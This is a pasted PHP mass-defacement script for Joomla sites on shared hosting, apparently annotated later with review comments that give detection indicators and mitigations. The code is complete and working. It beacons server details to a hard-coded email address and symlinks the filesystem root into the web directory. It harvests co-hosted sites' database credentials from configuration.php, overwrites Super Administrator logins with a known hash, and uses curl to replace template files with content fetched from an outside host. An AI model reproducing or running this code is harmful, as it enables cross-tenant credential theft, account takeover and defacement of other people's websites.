1337_Brain

joomla auto defacer

Jul 14th, 2014
  1. <html>
  2. <?
  3. //joomla auto defacer
  4. //coded by ECF
  // NOTE(review): PHP script intended to run on a shared web host. As the code below
  // shows, it mails the host's identity to a fixed address, publishes a symlink to "/"
  // under the web root, uses it to enumerate co-hosted sites and read their Joomla
  // configuration.php, then rewrites their admin credentials and template files.
  5.  
  // NOTE(review): display_errors=0 keeps PHP errors out of the response and
  // set_time_limit(0) removes the execution time limit.
  6. ini_set("display_errors", "0");
  7. set_time_limit(0);
  8. @session_start();
  9. echo "<p> <center> <font color=red font face='tahoma' size='6pt'>AUTOMATIC JOOMLA DEFACER </center></font> </p>";
  10. echo "<p> <center> <font color=green font face='tahoma' size='4pt'>CODED BY : ECF</center></font> </p>";
  11. echo "<p> <center> <font color=green font face='tahoma' size='4pt'>ECF</center></font> </p>";
  12. echo "<p> <center> <font color=green font face='tahoma' size='4pt'>http://blog.ecf.me</center></font> </p>";
  13. //mail feature
  // NOTE(review): beacon to a hard-coded mailbox. The subject is the server IP; the body
  // carries server IP, server name and this script's directory. Look for it in outbound
  // mail logs; listing mail in php.ini disable_functions blocks the call.
  14. $body=("server ip:".$_SERVER['SERVER_ADDR']." "."Site Name:".$_SERVER['SERVER_NAME']." "."Directory".dirname(__FILE__));
  15. mail('nadimzobaer@gmail.com',$_SERVER['SERVER_ADDR'],$body);
  16.  
  // NOTE(review): base URL of the directory this script is served from (http scheme,
  // SERVER_NAME + dirname of SCRIPT_NAME); later stages fetch their own files through it.
  17. $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
  18.  
  19. //create symlink of / to /ecf/root/
  // NOTE(review): creates ecf/ (mode 0777), writes an .htaccess into it and symlinks
  // ecf/root -> "/". The .htaccess maps .php and .html to text/plain, apparently so
  // that PHP files reached through the symlink are returned as source text.
  // The directives only take effect where AllowOverride lets .htaccess set Options and
  // FileInfo. SymLinksIfOwnerMatch (rather than FollowSymLinks) and running each
  // account's PHP under its own user are the usual server-side controls.
  // Indicators: an ecf/ directory under a web root, the "AddType text/plain .php"
  // line, and a symlink whose target is "/".
  // fopen() failure is silenced by @ and $fp goes to fwrite() unchecked.
  20. @mkdir('ecf',0777);
  21. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  22. $fp = @fopen ('ecf/.htaccess','w');
  23. fwrite($fp, $wr);
  24. @symlink('/','ecf/root');
  25. //collecting site names
  // NOTE(review): fetches /var/named through the ecf/root symlink over HTTP and splits
  // the returned HTML on '<li><a href="', so it relies on a directory index being served
  // for that path. Each entry has ".db" removed and is appended to sites.txt,
  // presumably giving one domain per DNS zone file (confirm against the host layout).
  // The loop starts at index 2, skipping the first two pieces of the split.
  // Defensive angle: this step fails if the web server does not follow the symlink or
  // does not generate directory indexes, or if allow_url_fopen is off.
  26. $text=file_get_contents($base_url.'/ecf/root/var/named/');
  27. $ar = explode('<li><a href="', $text);
  28. for($vi=2;$vi < count($ar);$vi++)
  29. {
  30. $var1 = strtok($ar[$vi], " ");
  31. $var1 = substr($var1,0,-2);
  32. $old=('.db');
  33. $new=('');
  34. $sites = str_replace($old , $new , $var1);
  35. $filename = 'sites.txt';
  36. $fp = fopen($filename, "a+");
  37. $write = fputs($fp, $sites."\n");
  38. fclose($fp);
  39. }
  40.  
  41. //collecting domainuser names for sites
  // NOTE(review): for every line of sites.txt, runs `ls -la /etc/valiases/<name>` via
  // exec() and appends the result (exec() returns the last output line) to lsla.txt.
  // The name is concatenated into the shell command without escaping.
  // Defensive angle: exec in php.ini disable_functions stops this stage. A web-server
  // process spawning `ls -la /etc/valiases/...` is a useful process-audit signal.
  42. $domainusers=file('sites.txt');
  43. foreach ($domainusers as $domainuser) {
  44. $textexec=("ls -la /etc/valiases/".$domainuser);
  45. $exec=exec($textexec);
  46. $filename = 'lsla.txt';
  47. $fp = fopen($filename, "a+");
  48. $write = fputs($fp, $exec."\n");
  49. fclose($fp);
  50. }
  51.  
  52. //creating final domain and domain user list
  // NOTE(review): turns each saved `ls -la` line into a "user:site " pair appended to
  // bhung.txt. The user is the text between "-rw-r----- 1 " and " mail" (the file
  // owner column for entries with exactly that mode and link count). The site is
  // whatever follows "/etc/valiases/" on the line.
  // Lines that do not match those markers yield an empty or partial user field.
  53. $lsla=file('lsla.txt');
  54. foreach ($lsla as $finaldom) {
  55. $user=entre2v2($finaldom,"-rw-r----- 1 "," mail");
  56. $site=substr(strstr($finaldom, '/etc/valiases'),14);
  57.  
  58. $filename = 'bhung.txt';
  59. $fp = fopen($filename, "a+");
  60. $write = fputs($fp, $user.":". $site." ");
  61. fclose($fp);
  62.  
  63. }
  64.  
  // NOTE(review): splits bhung.txt on spaces and sorts the pieces by length: anything
  // shorter than 6 characters goes to faltu.txt, the rest to gold.txt (one per line).
  // $strlen holds the string '6'; PHP compares it numerically with strlen()'s result.
  65. $f=file_get_contents('bhung.txt');
  66. $finals=explode(" ",$f);
  67. foreach ($finals as $final){
  68. $strlen=('6');
  69. $dr=strlen ($final);
  70. if ($dr < $strlen) {
  71.  
  72. $filename = 'faltu.txt';
  73. $fp = fopen($filename, "a");
  74. $write = fputs($fp, $final);
  75. fclose($fp);
  76. }
  77. else {
  78. $filename = 'gold.txt';
  79. $fp = fopen($filename, "a");
  80. $write = fputs($fp, $final."\n");
  81. fclose($fp);
  82. }
  83.  
  84. }
  85. //delete ajaira text files
  // NOTE(review): the four intermediate files are removed, but gold.txt is not in this
  // list, so the user:site inventory stays on disk next to the script and is a
  // forensic artifact worth collecting.
  86. unlink ('bhung.txt');
  87. unlink ('faltu.txt');
  88. unlink ('lsla.txt');
  89. unlink ('sites.txt');
  90.  
  // NOTE(review): $h is the body of a page fetched from a hard-coded remote URL; the loop
  // that follows submits it as the replacement template source. Outbound HTTP from the
  // web server to that host is a network indicator, and allow_url_fopen=Off makes this
  // file_get_contents() call fail.
  // gold.txt is re-read over HTTP via $base_url, so it is publicly retrievable from the
  // script's directory. The echo prints the header row of the result table.
  91. $h=file_get_contents('http://blog.ecf.me');
  92. $url=($base_url);
  93. $a=file($base_url.'/gold.txt');
  94. echo ("<center><table border=1 cellspacing=1 cellpading=1>
  95. <tr> <th width=200>Domain User</th> <th width=250>Website Name</td><th width=100>CMS</td><th width=200>Status</td></tr>");
  96.  
  // NOTE(review): main loop, one iteration per "user:site" line of gold.txt. Stages:
  //   1. read the account's Joomla configuration.php through the ecf/root symlink,
  //   2. connect to MySQL with the credentials found there,
  //   3. overwrite the Super Administrator username and password hash,
  //   4. log in to /administrator with curl and save $h over the active template's
  //      index.php.
  // Each stage depends on the previous one, so breaking any single link (symlink
  // following, world-readable configuration.php, DB account reachable from other
  // tenants' code) stops the chain for that site.
  97. foreach ($a as $final) {
  98. list($user, $site_url) = explode(":", $final);
  99. $site_urlto = substr($site_url, 0, -1);
  // NOTE(review): configuration.php is fetched over HTTP as text via the symlinked path.
  // Every "$" is replaced with "ecf" so that the markers "ecfuser = '" etc. match the
  // file's `$user = '...'` style assignments; the value up to "';" is extracted.
  100. $url2=($url."/ecf/root/home/".$user."/public_html/configuration.php");
  101. $configs=file_get_contents($url2);
  102. $old=('$');
  103. $new=('ecf');
  104. $configfile = str_replace($old , $new , $configs);
  105. $username=entre2v2($configfile, "ecfuser = '","';");
  106. $password=entre2v2($configfile, "ecfpassword = '","';");
  107. $dbname=entre2v2($configfile, "ecfdb = '","';");
  108. $dbprefix=entre2v2($configfile, "ecfdbprefix = '","';");
  109.  
  // NOTE(review): a table prefix longer than 2 characters is used as the test that a
  // Joomla configuration was actually parsed. mysql_* is the legacy ext/mysql API,
  // which was removed in PHP 7.
  110. $strlendbprefix= strlen ($dbprefix);
  111. if ($strlendbprefix > 2) {
  112. $link=mysql_connect("localhost",$username,$password) ;
  113.  
  114. mysql_select_db($dbname,$link) ;
  115.  
  // NOTE(review): sets username='admin' and a fixed password hash on every row whose
  // usertype is 'Super Administrator'. The hash literal is a direct indicator: search
  // <prefix>users.password for it during triage. Affected sites need the admin
  // accounts reset and the DB password rotated.
  116. $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J' where usertype='Super Administrator'");
  117.  
  118. //checking pass change
  // NOTE(review): reads the password back for username 'admin'; on a match the site is
  // appended to passchanged.txt (another on-disk artifact listing affected sites).
  119. $reqpass=('44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J');
  120. $checkpass= mysql_query("SELECT password FROM ".$dbprefix."users where username='admin'");
  121. $showpass=mysql_fetch_array ($checkpass);
  122. if ($showpass[0]== $reqpass) {
  123.  
  124. $filename = 'passchanged.txt';
  125. $fp = fopen($filename, "a+");
  126. $write = fputs($fp, $site_url."\n");
  127. fclose($fp);
  128. //upto this alright
  // NOTE(review): probes for an `extensions` table. A successful query selects the
  // branch that uses template_styles/extensions; a failed one selects the branch that
  // uses templates_menu. Presumably this separates newer from older Joomla schemas;
  // confirm against the versions in your estate.
  129. $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
  130.  
  131.  
  // NOTE(review): $co is a random 8-character name used as the curl cookie-jar file for
  // this site's admin session.
  132. $co=randomt();
  133.  
  134. if ( $req )
  135. {
  136.  
  // NOTE(review): looks up the default front-end template (client_id 0, home 1) and its
  // extension_id. $template_name is concatenated into the second query unescaped.
  137. $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
  138. $data = mysql_fetch_array($req);
  139. $template_name=$data["template"];
  140.  
  141. $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
  142. $data = mysql_fetch_array($req);
  143. $template_id=$data["extension_id"];
  144.  
  // NOTE(review): request 1 of 4: GET of the administrator login page to harvest the
  // hidden "return" value and the name of a hidden field whose value is "1".
  // $useragent is not assigned anywhere in this listing, so the User-Agent these
  // requests carry is not set by the script (TODO: confirm what access logs show).
  // The requests originate from the host running this script.
  145. $urlto=$site_urlto."/administrator/index.php";
  146.  
  147. $ch = curl_init();
  148. curl_setopt($ch, CURLOPT_URL, $urlto);
  149. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  150. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  151. curl_setopt($ch, CURLOPT_HEADER, 1);
  152. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  153. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  154. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  155.  
  156.  
  157. $buffer = curl_exec($ch);
  158.  
  159. $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
  160. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
  161.  
  162. ///////////////////////////
  // NOTE(review): request 2 of 4: POST to com_login as "admin" with the harvested fields.
  // The "com_config" check that follows has empty branches, so the login result is not
  // acted on.
  163. $urlto=$site_urlto."/administrator/index.php";
  164. $ch = curl_init();
  165. curl_setopt($ch, CURLOPT_URL, $urlto);
  166. curl_setopt($ch, CURLOPT_POST, 1);
  167. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&return=".$return."&".$hidden."=1");
  168. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  169. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  170. curl_setopt($ch, CURLOPT_HEADER, 0);
  171. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  172. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  173. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  174. $buffer = curl_exec($ch);
  175.  
  176. $pos = strpos($buffer,"com_config");
  177. if($pos === false) {
  178.  
  179. }
  180. else {
  181. }
  182. ///////////////////////////
  // NOTE(review): request 3 of 4: GET of the template source editor for index.php (the id
  // parameter is base64 of "<extension_id>:index.php") to harvest the form token name.
  183. $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  184. $ch = curl_init();
  185. curl_setopt($ch, CURLOPT_URL, $urlto);
  186. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  187. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  188. curl_setopt($ch, CURLOPT_HEADER, 0);
  189. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  190. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  191. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  192. $buffer = curl_exec($ch);
  193.  
  194. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
  195. if($hidden2) {
  196. }
  197. else {
  198.  
  199. }
  // NOTE(review): request 4 of 4: POST with task=source.save that writes $h as the
  // template's index.php. Detection: this GET/POST/GET/POST sequence against
  // /administrator/index.php in access logs, plus file-integrity alerts on
  // templates/<name>/index.php.
  200. $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
  201.  
  202. $ch = curl_init();
  203. curl_setopt($ch, CURLOPT_URL, $urlto);
  204. curl_setopt($ch, CURLOPT_POST, 1);
  205. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
  206.  
  207. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  208. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  209. curl_setopt($ch, CURLOPT_HEADER, 0);
  210. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  211. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  212. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  213. $buffer = curl_exec($ch);
  214.  
  // NOTE(review): success is inferred from the presence of a '<dd class="message message">'
  // element in the response. On success the template URL is appended to deftemp.txt,
  // which then lists every modified template and is useful for scoping cleanup.
  215. $pos = strpos($buffer,'<dd class="message message">');
  216. if($pos === false) {
  217. echo "<center><table border=1 cellspacing=1 cellpading=1>
  218. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
  219. }
  220. else {
  221. $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
  222. $filename = 'deftemp.txt';
  223. $fp = fopen($filename, "a+");
  224. $write = fputs($fp, $deftempurl."\n");
  225. fclose($fp);
  226.  
  227. echo "<center><table border=1 cellspacing=1 cellpading=1>
  228. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
  229.  
  230.  
  231. }
  232.  
  233. }
  234.  
  235. else
  236. {
  237.  
  // NOTE(review): alternate branch, taken when the `extensions` query failed. Same four
  // request sequence, but the template name comes from templates_menu and the editor
  // tasks are edit_source / save_source with a "filecontent" field.
  238. $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
  239. $data = mysql_fetch_array($req);
  240. $template_name=$data["template"];
  241.  
  242. $urlto=$site_urlto."/administrator/index.php";
  243. $ch = curl_init();
  244. curl_setopt($ch, CURLOPT_URL, $urlto);
  245. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  246. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  247. curl_setopt($ch, CURLOPT_HEADER, 1);
  248. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  249. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  250. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  251. $buffer = curl_exec($ch);
  252.  
  253. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
  254.  
  255. $urlto=$site_urlto."/administrator/index.php";
  256. $ch = curl_init();
  257. curl_setopt($ch, CURLOPT_URL, $urlto);
  258. curl_setopt($ch, CURLOPT_POST, 1);
  259. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&".$hidden."=1");
  260. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  261. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  262. curl_setopt($ch, CURLOPT_HEADER, 0);
  263. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  264. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  265. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  266. $buffer = curl_exec($ch);
  267.  
  268. $pos = strpos($buffer,"com_config");
  269.  
  270. if($pos === false) {
  271.  
  272. }
  273. else {
  274. }
  275. $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
  276. $ch = curl_init();
  277. curl_setopt($ch, CURLOPT_URL, $urlto);
  278. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  279. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  280. curl_setopt($ch, CURLOPT_HEADER, 0);
  281. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  282. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  283. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  284. $buffer = curl_exec($ch);
  285.  
  286. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
  287.  
  288. if($hidden2) {
  289.  
  290. }
  291. else {
  292.  
  293. }
  294.  
  295.  
  296. $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
  297. $ch = curl_init();
  298. curl_setopt($ch, CURLOPT_URL, $urlto);
  299. curl_setopt($ch, CURLOPT_POST, 1);
  300. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
  301. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  302. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  303. curl_setopt($ch, CURLOPT_HEADER, 0);
  304. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
  305. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
  306. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
  307. $buffer = curl_exec($ch);
  308.  
  // NOTE(review): this branch keys success on '<dd class="message message fade">'.
  309. $pos = strpos($buffer,'<dd class="message message fade">');
  310. if($pos === false) {
  311. echo "<center><table border=1 cellspacing=1 cellpading=1>
  312. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
  313. }
  314. else {
  315. $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
  316. $filename = 'deftemp.txt';
  317. $fp = fopen($filename, "a+");
  318. $write = fputs($fp, $deftempurl."\n");
  319. fclose($fp);
  320.  
  321. echo "<center><table border=1 cellspacing=1 cellpading=1>
  322. <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
  323.  
  324.  
  325. }
  326.  
  327. }
  328.  
  329.  
  330. //upto this alright
  331.  
  332.  
  333.  
  334.  
  335.  
  336.  
  337.  
  338.  
  339. }
  340. else {
  341. }
  342. }
  343. else {
  344. }
  345. }
  346.  
  // NOTE(review): final report. passchanged.txt is loaded and counted, but
  // $countpasschanged is not used again in this listing. The page then links to
  // deftemp.txt and passchanged.txt by relative URL, so both files sit in the script's
  // directory and are web-readable. Together with gold.txt and the ecf/ directory they
  // are the on-disk artifacts to collect when scoping an incident.
  347. $cntpasschanged=file('passchanged.txt');
  348. $countpasschanged= count ($cntpasschanged);
  349.  
  350.  
  351.  
  352. echo("<br>");
  353. $defacedurl=('<a href="deftemp.txt" target="_blank">View List of Defaced Site</a><br />');
  354. $passchangedurl=('<a href="passchanged.txt" target="_blank">View List of Password Changed site</a><br />');
  355. echo "<center><table border=1 cellspacing=1 cellpading=1>
  356. <td width=300><font color=green> $defacedurl</font></td><td width=300><font color=green> $passchangedurl </font></td></tr></table></center>";
  357.  
  358.  
  359.  
  360. //declaring function entre2v2
  // NOTE(review): string scraper used throughout the script. Splits $text on the start
  // marker, takes piece number $i (default 1, i.e. the text after the first occurrence),
  // splits that on the end marker and returns the first part, trimmed.
  // There is no check that either marker was found: $ar0[$i] is read unconditionally.
  361. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  362. $ar0=explode($marqueurDebutLien, $text);
  363. $ar1=explode($marqueurFinLien, $ar0[$i]);
  364. return trim($ar1[0]);
  365. }
  366.  
  // NOTE(review): returns an 8-character string (loop runs for $i = 0..7) drawn from
  // $chars with rand(), after seeding from microtime(). The main loop uses the result
  // as the curl cookie-jar filename, so a relative 8-character [a-z0-9] file may appear
  // where the script runs. Presumably that is the script's working directory; confirm
  // on the affected host.
  367. function randomt() {
  368.  
  369. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  370. srand((double)microtime()*1000000);
  371. $i = 0;
  372. $pass = '' ;
  373.  
  374. while ($i <= 7) {
  375. $num = rand() % 33;
  376. $tmp = substr($chars, $num, 1);
  377. $pass = $pass . $tmp;
  378. $i++;
  379. }
  380.  
  381. return $pass;
  382.  
  383. }
  384.  
  385.  
  386. ?>